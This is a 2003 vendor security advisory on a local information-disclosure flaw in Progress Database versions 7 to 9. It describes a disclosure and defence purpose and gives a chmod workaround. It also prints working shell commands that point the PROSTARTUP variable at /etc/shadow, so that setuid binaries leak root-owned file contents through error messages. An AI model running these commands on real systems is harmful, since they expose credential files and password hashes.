Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team research@secnetops.com Team Lead Contact kf@secnetops.com Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number : SRT2003-04-02-1735 Product : Progress Database Version : Versions 7 to 9 Vendor : progress.com Class : local Criticality : Medium to Low Operating System(s) : Linux, SunOS, SCO, TRU64, *nix High Level Explination ************************************************************************ High Level Description : Error messages can provide root owned data What to do : chmod -s all suid binaries in /usr/dlc Technical Details ************************************************************************ Proof Of Concept Status : No PoC is needed. Low Level Description : The Progress Database reads configuration files as the root user. No checks are made to verify that the user running thr program has the permission to read the configuration file. A user can simply specify a root owned file and cause an error message to be generated to view the file contents. Most versions beyond v6 appear to be affected. An example variable that can be abused is the PROSTARTUP variable. bash-2.03$ cat /etc/shadow cat: cannot open /etc/shadow: Permission denied (error 13) bash-2.03$ export PROSTARTUP=/etc/shadow bash-2.03$ export PROMSGS=/path/to/promsgs bash-2.03$ /u/dlc7/bin/_mprosrv 17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301) bash-2.03$ /u/dlc8/bin/_mprosrv 17:37:20 SERVER : ** Could not recognize argument: daemon:*::0:0. (301) bash-2.03$ /u/dlc9/bin/_mprosrv 17:37:08 SERVER : ** Could not recognize argument: daemon:*::0:0. (301) Luckily on the machine I chose to exploit the line that was read from the shadow file did not have an encrypted hash. This however is not always the case. Patch or Workaround : chmod -s all suid binaries in the $DLC folder Vendor Status : vendor has been notified and is working on a fix Bugtraq URL : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact research@secnetops.com for information on how to obtain exploit information.